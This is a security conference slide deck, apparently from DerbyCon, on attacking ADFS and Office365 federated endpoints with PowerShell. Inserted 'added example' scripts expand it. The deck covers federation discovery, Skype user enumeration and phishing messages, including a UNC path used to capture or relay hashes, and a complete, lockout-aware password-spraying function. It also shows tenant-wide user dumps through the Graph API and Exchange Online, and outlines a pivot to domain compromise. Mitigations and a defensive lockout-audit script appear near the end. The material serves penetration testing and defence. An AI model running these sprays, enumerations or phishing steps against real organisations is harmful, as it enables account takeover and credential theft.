Attacking ADFS Endpoints with PowerShell
Karl Fosaaen
Introductions
• Who am I?
‒Karl Fosaaen
• What do I do?
‒Wear lots of hats
‒Pen Testing
‒Password Cracking
‒Social Engineering
‒Blog
‒DEF CON Swag Goon
‒Pinball Repair
Introductions
• Hacker Jeopardy Champion
Slides Overview
• ADFS Overview
• Attack Walkthroughs
‒ Identifying Federated Endpoints
‒ Setting Up Your Test Environment
‒ User Enumeration
‒ Email Validation and Social Engineering Recon
‒ Skype Message Phishing
‒ Dictionary Attacks Against Federated Accounts
‒ Enumeration of Other Federated Domain Users
‒ Pivoting to the Internal Network
• Attack Mitigations
• Conclusions/Questions
ADFS Overview
ADFS Overview
Active Directory Federation Services (AD FS)
“is a standards-based service that allows the
secure sharing of identity information
between trusted business partners (known
as a federation) across an extranet.”
Source:
https://msdn.microsoft.com/en-us/library/bb897402.aspx
ADFS Overview
Some Terms:
‒ IdP
‒ SAML
‒ WS-Federation
‒ WS-Trust
‒ ADAL
ADFS Overview
Federation can mean many things
‒ Domain to Domain
‒ Domain to Microsoft
‒ Arbitrary meanings based on forum posts
ADFS Overview
Frequently Federated Services
• Office365
• Skype for Business
• Exchange
• Azure AD
• SharePoint
• Apps in General
Attack Walkthroughs
• Identifying Federated Endpoints
• Setting Up Your Test Environment
• User Enumeration
• Email Validation and Social Engineering Recon
• Skype Message Phishing
• Dictionary Attacks Against Federated Accounts
• Enumeration of Other Federated Domain Users
• Pivoting to the Internal Network
Identifying Federated Endpoints
Identifying Federated Endpoints
Side Note:
• Office365 had an Authentication Bypass issue
‒ Insecure SAML assertions
‒ Affected all federated Office365 domains
‒ They called out this method in their blog post
Source:
http://www.economyofmechanism.com/office365-authbypass.html
Identifying Federated Endpoints
• Using Microsoft Online
Identifying Federated Endpoints
• Example user check request
Identifying Federated Endpoints
• Microsoft’s Responses
‒ Federated Domain
‒ Microsoft Managed Domain
ADFS Overview
Diagram of (Managed) O365 federation
ADFS Overview
Diagram of (Federated) O365 federation
Identifying Federated Endpoints
• Let’s wrap it in a PowerShell script
‒ Federated Domain
‒ Microsoft Managed Domain
https://blog.netspi.com/using-powershell-identify-federated-domains/
https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints
• Multiple domains at once
https://blog.netspi.com/using-powershell-identify-federated-domains/
https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints
• Using DNS TXT records
Identifying Federated Endpoints
• Using DNS TXT records
• Look for the MS=* records
Identifying Federated Endpoints
• What about the top 1 million Alexa sites?
‒ 47,455 (4.7%) of the top 1 Million have
“ms=ms*” records
• DNS can be a pain at a million records
*Still better than a million HTTP requests to Microsoft
• Other options
‒ ADFS.domain.com
‒ STS.domain.com
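The two discovery methods above (the Microsoft Online user-realm check and the MS=ms* DNS TXT record), as an added example that is not the NetSPI Get-ADFSEndpoint script. It queries the public getuserrealm.srf endpoint on login.microsoftonline.com, which reports NameSpaceType "Federated" (with the ADFS AuthURL), "Managed" or "Unknown" for the domain part of any login, then checks DNS for the verification record and the adfs./sts. hostnames. The domain names in the usage line are placeholders.

```powershell
# Added example (not from the deck or the NetSPI scripts).
# Classify domains as Federated/Managed via the Microsoft Online realm lookup.
function Get-DomainFederationType {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$Domain
    )
    process {
        foreach ($d in $Domain) {
            # Any local part works; the realm lookup keys on the domain suffix.
            $uri = "https://login.microsoftonline.com/getuserrealm.srf?login=user@$d&xml=1"
            try {
                # Response is XML: <RealmInfo><NameSpaceType>Federated|Managed|Unknown</NameSpaceType>...
                $realm = Invoke-RestMethod -Uri $uri -ErrorAction Stop
                $info  = $realm.RealmInfo
                [pscustomobject]@{
                    Domain        = $d
                    NameSpaceType = $info.NameSpaceType
                    AuthURL       = $info.AuthURL            # ADFS sign-in URL, only when Federated
                    Brand         = $info.FederationBrandName
                }
            } catch {
                Write-Warning "Realm lookup failed for $d : $($_.Exception.Message)"
            }
        }
    }
}

# Check the DNS side: the MS=ms* TXT verification record plus the usual ADFS hostnames.
function Get-MsVerificationRecord {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string[]]$Domain)
    process {
        foreach ($d in $Domain) {
            # Resolve-DnsName ships with the DnsClient module (Windows 8 / Server 2012 and later).
            $txt = Resolve-DnsName -Name $d -Type TXT -ErrorAction SilentlyContinue |
                   Where-Object { $_.Strings -like 'MS=ms*' }
            $hosts = foreach ($h in 'adfs', 'sts') {
                if (Resolve-DnsName -Name "$h.$d" -ErrorAction SilentlyContinue) { "$h.$d" }
            }
            [pscustomobject]@{
                Domain    = $d
                MsRecord  = (@($txt.Strings) | Where-Object { $_ -like 'MS=ms*' }) -join ','
                AdfsHosts = $hosts -join ','
            }
        }
    }
}

# Usage (placeholder domains): the realm check is one HTTPS request per domain,
# so for a large list run the DNS check first and only query Microsoft for hits.
'example.com', 'example.org' | Get-MsVerificationRecord | Format-Table -AutoSize
'example.com', 'example.org' | Get-DomainFederationType | Format-Table -AutoSize
```

An MS=ms* record only proves the domain was once verified in an Office 365 tenant; the realm lookup is what distinguishes a federated domain (ADFS in the path, so the dictionary attack targets the customer's endpoint) from a managed one (password verified by Microsoft).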
Setting Up Your Test Environment
Setting Up Your Test Environment
• Basic Overview
‒ Buy/Have a domain
‒ Set up/Purchase Skype for Business*
‒ Install Skype for Business Client*
‒ Install Lync 2013 SDK*
‒ Get the NetSPI PowerShell Modules
‒ Install Azure AD PowerShell module
*Note: This is only needed for testing federated Skype for Business
Setting Up Your Test Environment
• Buy your domain
Setting Up Your Test Environment
• Get hosted Office365 services
‒ Or set up your own server
Setting Up Your Test Environment
• Add your domain to the Office365 portal
Setting Up Your Test Environment
• Set up your user and enable federation
Setting Up Your Test Environment
• Install Skype for Business and the Lync SDK
‒ Requires Visual Studio 2010 for the easiest
install
https://www.microsoft.com/en-us/download/details.aspx?id=36824
Setting Up Your Test Environment
• Login to Skype for Business as your user
Setting Up Your Test Environment
• Grab the PowerShell modules from NetSPI
• https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
• https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Setting Up Your Test Environment
• Install the Azure AD PowerShell Module
• https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
User Enumeration
User Enumeration
• We have:
‒ Some Targets/Endpoints
‒ A testing environment
• We need:
‒ Some users to attack
• Enumerate some users for the organization
off of LinkedIn
• Use one of the many recon frameworks
• Check out the User enumeration work that
nyxgeek spoke about on Friday
Email Validation and Social Engineering Recon
Email Validation and SE Recon
• Using our federated Skype, we can find
information about other federated Skype
users
• Just open a chat with them
Email Validation and SE Recon
• Or we can just chat with these CEOs
Email Validation and SE Recon
• Let’s just wrap it with PowerShell instead
Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
Email Validation and SE Recon
Email Validation and SE Recon
Demo
• Get-SkypeStatus -inputFile "C:\Temp\LiveAdmins.txt" | ft -AutoSize
• It helps if we run it a couple of times…
Email Validation and SE Recon
Email Validation and SE Recon
• What about the top 1 million Alexa sites
• Of those 47,455 “ms=ms*” records
‒ 45 have “Administrator” accounts that have
federated Skype for Business accounts
‒ None of those were actively online during testing…
‒ From nyxgeek:
• 38,658 (3.8%) have hostname
http://lyncdiscover.domain.com
• 486 of 995 unique (Fortune 1000 - 2015) domain
names
• Note:
‒ Skype doesn’t like opening 2,000+ conversations at a time
Skype Message Phishing
Skype Message Phishing
Invoke-SendSkypeMessage
-email test@example.com
-message "What's your password?"
Get-SkypeStatus -inputFile 'C:\Emails.txt' |
Select Email,Status |
where Status -Match "Available" |
select Email | Invoke-SendSkypeMessage …
Email Validation and SE Recon
Demo
• Get-SkypeStatus -email karl.fosaaen@netspi.com
• Invoke-SendSkypeMessage
-email karl.fosaaen@netspi.com
-message "Hello from Derbycon"
• for ($i = 0; $i -lt 10; $i++){Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
Email Validation and SE Recon
Email Validation and SE Recon
Email Validation and SE Recon
Demo
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "\\192.168.1.123\test"
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "www.microsoftsupport.online"
• SMB capture/relay running on internal network
• UNC works on internal, HRefs work for external
• Send this message out to a group, get or relay hashes
Skype Message Phishing
• Further Work
‒ Grab a domain's worth of phone numbers
• Got this working while making these slides…
• Should work if you already have creds
‒ Brute-Forcing Skype Creds
• Not easy with the Lync SDK
• Nyxgeek has some great methods that will be
added to PowerSkype
Dictionary Attacks Against Federated Accounts
Dictionary Attacks Against ADFS
• Get-ADFSEndpoint gives us the appropriate
command to run for the domain
‒ Federated Domain
Dictionary Attacks Against ADFS
• Invoke-ADFSSecurityTokenRequest*
Invoke-ADFSSecurityTokenRequest
-ClientCredentialType UserName
-ADFSBaseUri https://adfs.example.com/
-AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed
-UserName 'karl.fosaaen'
-Password 'Winter2016'
-Domain 'example.com'
-OutputType Token
-SAMLVersion 2
-IgnoreCertificateErrors
https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security-token-with-powershell/
Dictionary Attacks Against ADFS
• Get-ADFSEndpoint gives us the appropriate
command to run for the domain
‒ Microsoft Managed Domain
Dictionary Attacks Against ADFS
• Connect-MsolService (Azure AD PowerShell module)
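The two dictionary-attack paths above (WS-Trust usernamemixed for a federated domain, Connect-MsolService for a managed one) driven from one user list, as an added example that is not part of the deck. It assumes Invoke-ADFSSecurityTokenRequest from the MSDN post cited above has been dot-sourced (it throws when the token request fails, which is how a bad password shows up), and that the MSOnline module is installed for the managed case. The -Type value is what Get-ADFSEndpoint reports for the domain; user list, password and ADFS URL are placeholders.

```powershell
# Added example (not from the deck). One password across many users, paced,
# so that AD account lockout and ADFS extranet lockout are not tripped.
function Invoke-FederatedPasswordSpray {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][ValidateSet('Federated', 'Managed')][string]$Type,
        [Parameter(Mandatory)][string[]]$User,
        [Parameter(Mandatory)][string]$Password,
        [string]$AdfsBaseUri,          # Federated only, e.g. https://adfs.example.com/
        [int]$DelaySeconds = 2         # pause between users; assumption, tune to the target's policy
    )
    if ($Type -eq 'Federated' -and -not $AdfsBaseUri) {
        throw 'AdfsBaseUri is required for a federated domain'
    }
    foreach ($u in $User) {
        $sam = $u.Split('@')[0]
        $upn = if ($u -like '*@*') { $u } else { "$u@$Domain" }
        $ok  = $false
        try {
            switch ($Type) {
                'Federated' {
                    # Same call as on the slide; the WS-Trust endpoint returns a SOAP fault on bad creds
                    $null = Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName `
                        -ADFSBaseUri $AdfsBaseUri `
                        -AppliesTo "$($AdfsBaseUri.TrimEnd('/'))/adfs/services/trust/13/usernamemixed" `
                        -UserName $sam -Password $Password -Domain $Domain `
                        -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors
                    $ok = $true
                }
                'Managed' {
                    # Microsoft verifies the password; Connect-MsolService throws on failure
                    $sec  = ConvertTo-SecureString -String $Password -AsPlainText -Force
                    $cred = New-Object System.Management.Automation.PSCredential($upn, $sec)
                    Connect-MsolService -Credential $cred -ErrorAction Stop
                    $ok = $true
                }
            }
        } catch {
            Write-Verbose "$upn : $($_.Exception.Message)"
        }
        [pscustomobject]@{ User = $upn; Password = $Password; Success = $ok }
        Start-Sleep -Seconds $DelaySeconds
    }
}

# Usage (placeholders): one round per password, wait out the lockout observation
# window before the next round.
$users = Get-Content .\users.txt
Invoke-FederatedPasswordSpray -Domain example.com -Type Federated `
    -AdfsBaseUri https://adfs.example.com/ -User $users -Password 'Winter2016' |
    Where-Object Success
```

Every attempt against the federated endpoint is a real logon against the customer's domain controllers, so it counts toward the AD lockout threshold and toward ADFS extranet lockout where that is enabled; a spray of one password per round with a delay at least as long as the observation window is the only shape of this attack that does not lock accounts.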
Enumeration of Other Federated Domain Users
Enumeration of Other Domain Users
• Not totally necessary, but it can be handy
1. $msolcred = Get-Credential
2. Connect-MsolService -Credential $msolcred
3. Get-MsolUser -All | ft -AutoSize
• This also works for apps using AzureAD for
account management
Enumeration of Other Domain Users
• Using the Graph API
Enumeration of Other Domain Users
• Using the Graph API
$token = Get-GraphAPIToken -TenantName
DOMAIN_GOES_HERE
Get-GraphData -Token $token -Tenant
DOMAIN_GOES_HERE -Resource users
‒ This works for federated and managed domains
• Github –
https://github.com/NetSPI/PowerShell/blob/master/Get-GraphAPIToken.ps1
Enumeration of Other Domain Users
Demo
• $token = Get-GraphAPIToken -TenantName
microsoftsupport.online
• Get-GraphData -Token $token -Tenant
microsoftsupport.online -Resource users
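What the Get-GraphAPIToken / Get-GraphData pair above does, written out as an added example that is not the NetSPI script: an OAuth2 password grant against the v1 token endpoint for a tenant, then a paged walk of the Azure AD Graph users collection with the bearer token. The client id is the well-known Azure PowerShell client id that Microsoft's own module uses for this grant; tenant, user and password in the usage line are placeholders.

```powershell
# Added example (not from the deck or the NetSPI scripts).
function Get-AadGraphUsers {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Tenant,             # e.g. example.com or the tenant GUID
        [Parameter(Mandatory)][pscredential]$Credential,   # any valid user in (or federated into) the tenant
        [string]$Resource = 'https://graph.windows.net',
        [string]$ClientId = '1b730954-1685-4b74-9bfd-dac224a7b894'
    )
    # Resource Owner Password Credentials grant; for a federated user the token
    # endpoint itself drives the WS-Trust exchange with the customer's ADFS.
    $body = @{
        grant_type = 'password'
        resource   = $Resource
        client_id  = $ClientId
        username   = $Credential.UserName
        password   = $Credential.GetNetworkCredential().Password
    }
    $tokenResponse = Invoke-RestMethod -Method Post `
        -Uri "https://login.microsoftonline.com/$Tenant/oauth2/token" -Body $body
    $headers = @{ Authorization = "Bearer $($tokenResponse.access_token)" }

    # Azure AD Graph pages results; odata.nextLink is relative to the tenant root
    # and the api-version query parameter has to be re-added on every page.
    $uri = "https://graph.windows.net/$Tenant/users?api-version=1.6"
    do {
        $page = Invoke-RestMethod -Uri $uri -Headers $headers
        foreach ($u in $page.value) {
            [pscustomobject]@{
                UPN         = $u.userPrincipalName
                DisplayName = $u.displayName
                Mail        = $u.mail
                Enabled     = $u.accountEnabled
            }
        }
        $next = $page.'odata.nextLink'
        $uri  = if ($next) { "https://graph.windows.net/$Tenant/$next&api-version=1.6" } else { $null }
    } while ($uri)
}

# Usage (placeholders)
$cred = Get-Credential -Message 'user@example.com'
Get-AadGraphUsers -Tenant example.com -Credential $cred | Export-Csv .\tenant_users.csv -NoTypeInformation
```

Two caveats a tester needs: the password grant fails outright for any user who has MFA or a conditional-access policy, so a successful call is itself a finding about that account; and Azure AD Graph (graph.windows.net) has since been retired, with Microsoft Graph (https://graph.microsoft.com/v1.0/users, which returns absolute @odata.nextLink URLs) as the current equivalent of the same enumeration.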
Enumeration of Other Domain Users
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains
• If the domain uses Office365, you can connect
to it with PowerShell
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains (1/2)
$PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "test@example.com", $PWord
Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains that have OWA tied to O365 (2/2)
Invoke-Command `
-ConfigurationName Microsoft.Exchange `
-ConnectionUri https://outlook.office365.com/powershell-liveid/ `
-Credential $credentials `
-Authentication Basic -AllowRedirection `
-ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:\temp\email_users.csv -NoTypeInformation
Enumeration of Other Domain Users
Pivoting to the Internal Network
Pivoting to the Internal Network
• Single Factor VPN Example
‒ Enumerated user emails on LinkedIn
‒ Guessed passwords against MSOnline with
PowerShell
‒ Enumerated VPN interfaces
‒ Logged in with guessed credentials
‒ GPP -> Local admin on DA system
‒ DCSync
• “Store passwords using reversible encryption”
Pivoting to the Internal Network
• Other Routes
‒ Single Factor Services
• Management Protocols
• RDP
• SSH
• SharePoint
• Terminal Services – Web Based
• Citrix
• VDI
• Etc.
Pivoting to the Internal Network
• Malicious OneDrive Documents
‒ Can’t use macros in the online version of Excel
Pivoting to the Internal Network
• Malicious SharePoint Documents
‒ Same concept as OneDrive, just a different
platform
‒ Backdoor a document
‒ Edit pages
Pivoting to the Internal Network
• Send messages from OWA or Skype for
Business
‒ Autodiscover is handy
‒ People will trust their co-workers
• “Can you look over this word doc for me?”
Pivoting to the Internal Network
• Attacking Email Accounts
‒ If Autodiscover is enabled, adding an account
can be done from anywhere
‒ Email is interesting, but I’d like a shell
‒ This cannot easily be done programmatically with PowerShell
‒ “Malicious Outlook Rules”
• Nick Landers – Silent Break Security
‒ “MAPI over HTTP and Mailrule Pwnage”
• Etienne - sensepost
Attack Mitigations
Attack Mitigations
• Enable two-factor authentication for external endpoints*
*On all channels
Attack Mitigations
• Limit federation to trusted domains
• Limit exposed services surface area
• Monitor your Federated and Azure endpoints
• Enforce strong password requirements
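The server-side controls behind these mitigations, as an added example that is not from the deck: a check of the AD FS properties that govern extranet (soft) lockout, the corrected setting beside it, and a quick look at the AD FS admin log for the password-guessing the talk demonstrates. Run on an AD FS server (Windows Server 2012 R2 or later) as an AD FS administrator; the threshold of 10, the 30-minute window and the one-hour lookback are assumptions, not values from the deck.

```powershell
# Added example (not from the deck). Audit the extranet lockout posture that
# limits the dictionary attack against /adfs/services/trust/13/usernamemixed.
function Test-AdfsLockoutPosture {
    $p = Get-AdfsProperties
    $findings = @()
    if (-not $p.EnableExtranetLockout) {
        $findings += 'Extranet lockout disabled: external guessing is limited only by AD account lockout'
    }
    elseif ($p.ExtranetLockoutThreshold -gt 20) {
        $findings += "ExtranetLockoutThreshold is $($p.ExtranetLockoutThreshold); 20 or fewer is a sane ceiling (assumption)"
    }
    [pscustomobject]@{
        EnableExtranetLockout     = $p.EnableExtranetLockout
        ExtranetLockoutThreshold  = $p.ExtranetLockoutThreshold
        ExtranetObservationWindow = $p.ExtranetObservationWindow
        Findings                  = $findings
    }
}

# The corrected setting. Keep the ADFS threshold below the AD account lockout
# threshold so a guesser trips the soft lockout before locking the real user out of AD.
function Enable-AdfsExtranetLockout {
    param([int]$Threshold = 10, [int]$WindowMinutes = 30)
    Set-AdfsProperties -EnableExtranetLockout $true `
        -ExtranetLockoutThreshold $Threshold `
        -ExtranetObservationWindow (New-TimeSpan -Minutes $WindowMinutes)
    Get-AdfsProperties | Select-Object EnableExtranetLockout, ExtranetLockoutThreshold, ExtranetObservationWindow
}

# Monitoring: AD FS logs event 411 (token validation failed) in the AD FS/Admin
# log for each bad password; bursts of 411s across many users are a spray.
function Get-AdfsFailedLogons {
    param([int]$Hours = 1)
    Get-WinEvent -FilterHashtable @{ LogName = 'AD FS/Admin'; Id = 411; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Client IP appears in the message once the extranet lockout update is installed; otherwise left blank
            $ip = if ($_.Message -match 'Client IP:\s*([^\r\n]+)') { $Matches[1].Trim() } else { '' }
            [pscustomobject]@{ Time = $_.TimeCreated; ClientIP = $ip }
        } |
        Group-Object ClientIP | Sort-Object Count -Descending |
        Select-Object @{ n = 'ClientIP'; e = { $_.Name } }, Count
}

Test-AdfsLockoutPosture
Get-AdfsFailedLogons -Hours 1
```

Extranet lockout only applies to requests that arrive through the Web Application Proxy, so an ADFS server exposed directly, or reachable from inside the network, gets none of this protection; that is the same reason the deck's first mitigation is two-factor on every external channel rather than lockout alone.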
Thanks!
• My NetSPI Co-workers
‒ QA/Ideas/Suggestions
• My NetSPI Management Team
‒ For giving me time to work on this
• Jared Bird - @jaredbird
‒ For asking me about federation years ago
Questions
Questions?
Karl Fosaaen
@kfosaaen
https://blog.netspi.com
https://github.com/netspi
http://www.slideshare.net/kfosaaen

Attacking ADFS Endpoints - DerbyCon